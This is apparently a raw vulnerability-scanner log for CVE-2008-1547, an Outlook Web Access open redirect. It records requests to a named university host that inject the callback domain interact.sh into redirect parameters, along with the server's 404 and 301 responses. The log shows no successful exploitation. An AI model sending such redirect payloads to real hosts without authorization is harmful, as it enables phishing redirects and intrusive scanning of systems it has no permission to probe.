[CVE-2008-1547] Dumped HTTP request for http://admin.trinity.unimelb.edu.au/exchweb/bin/redir.asp?URL=https://interact.sh


GET /exchweb/bin/redir.asp?URL=https://interact.sh HTTP/1.1
Host: admin.trinity.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2008-1547] Dumped HTTP response http://admin.trinity.unimelb.edu.au/exchweb/bin/redir.asp?URL=https://interact.sh

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 1245
Content-Security-Policy: child-src 'self' blob: ;    frame-src 'self' *.google.com *.facebook.com *.twitter.com *.recaptcha.net *.payway.com.au *.youtube.com *.vimeo.com *.viddler.com *.sharethis.com *.ddsn.net;    frame-ancestors 'self' *.ddsn.net
Content-Type: text/html
Date: Wed, 06 Aug 2025 15:17:06 GMT
Server: Microsoft-IIS/10.0
X-Frame-Options: SAMEORIGIN
X-Powered-By: ASP.NET

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - File or directory not found.</h2>
  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
 </fieldset></div>
</div>
</body>
</html>

[CVE-2008-1547] Dumped HTTP request for http://admin.trinity.unimelb.edu.au/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0


GET /CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0 HTTP/1.1
Host: admin.trinity.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2008-1547] Dumped HTTP response http://admin.trinity.unimelb.edu.au/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0

HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 254
Content-Security-Policy: child-src 'self' blob: ;    frame-src 'self' *.google.com *.facebook.com *.twitter.com *.recaptcha.net *.payway.com.au *.youtube.com *.vimeo.com *.viddler.com *.sharethis.com *.ddsn.net;    frame-ancestors 'self' *.ddsn.net
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:17:06 GMT
Location: https://admin.trinity.unimelb.edu.au/admin?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0
Server: Microsoft-IIS/10.0
X-Frame-Options: SAMEORIGIN
X-Powered-By: ASP.NET

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://admin.trinity.unimelb.edu.au/admin?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&amp;reason=0">here</a></body>
